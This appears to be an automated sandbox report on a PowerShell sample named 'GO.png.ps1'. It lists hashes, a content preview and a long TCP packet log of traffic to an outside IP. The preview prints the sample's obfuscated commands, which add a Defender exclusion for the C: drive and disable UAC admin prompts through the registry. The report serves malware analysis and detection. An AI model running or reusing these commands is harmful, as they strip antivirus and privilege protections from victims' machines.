                                                File type:ASCII text, with CRLF line terminators
                                                Entropy (8bit):5.492286794735796
                                                TrID:
                                                  File name:GO.png.ps1
                                                  File size:449 bytes
                                                  MD5:8f5f07bdb2e91ee9c9bb9614592cf7fc
                                                  SHA1:5545322f658c9cd1884b799244aef8eeac3c00c4
                                                  SHA256:3c818d91af1ad7aaa0e599d76ff395e5b694bd2cf05d65d0b53d2036fea726c8
                                                  SHA512:6b19b2da70f5de7daa4b81f8f8958c122e6a79c43016c5fa5462ae32e2255b5840088d3d883719bed2267d806d9946c9422f2809462e71cf9450669206a42b03
                                                  SSDEEP:12:sQkuZM/GfMLsVjhRaEfZyjSHrZF81NFmMrE:JkuO/GkoV1VBy2HrZC74
                                                  TLSH:ADF0A376C94842B7D9B37581D2555917F4A9401A10764C01557CC9216B1AA07E6FE1CF
                                                  File Content Preview:powershell Add-MpPreference -ExclusionPath "GOOcGOO:\GOO".replace('GOO','')..Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Force..start-sleep -s 6..

                                                  File Icon

                                                  Icon Hash:3270d6baae77db44

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 18, 2024 14:07:33.712060928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:33.834198952 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:33.834290028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:33.835376978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:33.955034018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287214994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287328959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287414074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.287461996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287585974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287600994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287631989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.287801981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287815094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.287842989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.287992954 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.288005114 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.288017988 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.288042068 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.288084030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.407617092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.407691956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.407756090 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.411823034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.456437111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.496242046 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.496260881 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.496378899 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.500458002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.500727892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.500785112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.508908987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.509032965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.509097099 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.517457962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.517591000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.517666101 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.525902033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.525964975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.526043892 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.534404993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.534539938 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.534594059 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.542926073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.543019056 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.543071032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.551392078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.551497936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.551565886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.559818983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.559880972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.559936047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.568211079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.568326950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.568377018 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.577639103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.577661037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.577716112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.590034962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.615895033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.615981102 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.746172905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.746300936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.746383905 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.748092890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.748156071 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.748209953 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.751872063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.751995087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.752054930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.755764961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.755876064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.755932093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.759543896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.759558916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.759633064 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.763338089 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.763446093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.763516903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.767117977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.767281055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.767354012 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.770935059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.771045923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.771092892 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.774753094 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.774888992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.774946928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.778526068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.778681040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.778733015 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.782497883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.782516956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.782578945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.786159039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.786319017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.786375046 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.790353060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.790477991 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.790534019 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.793998957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.794053078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.794111013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.797694921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.797764063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.797808886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.801418066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.847017050 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.869036913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.869101048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.869153976 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.870920897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.925287962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.938186884 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.938328028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.938379049 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.940144062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.940748930 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.940793037 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.940831900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.944619894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.944664001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.944725990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.948479891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.948540926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.948582888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.952183008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.952244043 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.952380896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.956178904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.956202984 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.956265926 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.959856987 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.959913969 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.959918976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.963629007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.963689089 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.963726044 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.967842102 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.967899084 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.967930079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.971342087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.971384048 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.971421957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.975146055 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.975164890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.975182056 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.978892088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.978955030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.979055882 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.982784033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.982842922 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.982891083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.986464977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.986517906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.986603975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.990248919 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.990344048 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.990361929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.994062901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.994092941 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.994127989 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.998194933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:35.998245955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:35.998264074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.001305103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.001357079 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.001439095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.004136086 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.004195929 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.004208088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.006642103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.006700993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.006731033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.009692907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.009747982 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.064498901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.064647913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.064696074 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.065906048 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.066612005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.066653013 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.066828012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.069394112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.069439888 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.069559097 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.072650909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.072681904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.072693110 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.075622082 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.075666904 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.075784922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.078234911 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.078274965 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.078304052 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.081063986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.081115007 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.130930901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.130945921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.130999088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.131655931 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.131690025 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.131742001 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.133852005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.133965015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.134021044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.135873079 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.135966063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.136049986 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.137892008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.138014078 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.138061047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.140234947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.140383005 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.140434980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.142513990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.142528057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.142585039 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.144781113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.144889116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.144929886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.147111893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.147196054 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.147245884 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.149396896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.149590015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.149635077 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.151614904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.151745081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.151789904 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.153939009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.154057026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.154102087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.156207085 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.156380892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.156433105 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.158663034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.158776045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.158816099 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.160793066 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.160857916 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.160901070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.163151979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.163281918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.163331032 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.165374041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.165504932 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.165549994 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.167634964 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.167773008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.167813063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.170129061 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.170280933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.170361996 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.172255039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.172374010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.172447920 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.174494028 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.174695015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.174743891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.176827908 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.176943064 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.177002907 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.179131031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.179220915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.179280043 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.181602955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.181657076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.181874990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.183689117 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.183841944 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.183901072 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.185988903 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.186141968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.186199903 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.188452959 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.188505888 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.188590050 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.190568924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.190676928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.190762997 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.192759037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.192918062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.192981958 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.195394993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.195408106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.195461988 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.197057962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.197253942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.197314024 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.199069023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.199227095 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.199281931 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.201050043 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.201196909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.201253891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.203052998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.203217983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.203279972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.205092907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.205194950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.205264091 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.207035065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.207146883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.207202911 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.208997011 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.209075928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.209137917 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.268080950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.268120050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.268219948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.268896103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.268951893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.269006968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.270816088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.271614075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.271631002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.271671057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.273529053 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.273581028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.273610115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.275527000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.275589943 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:36.275743961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:36.277467966 CET8049707176.113.115.178192.168.2.8
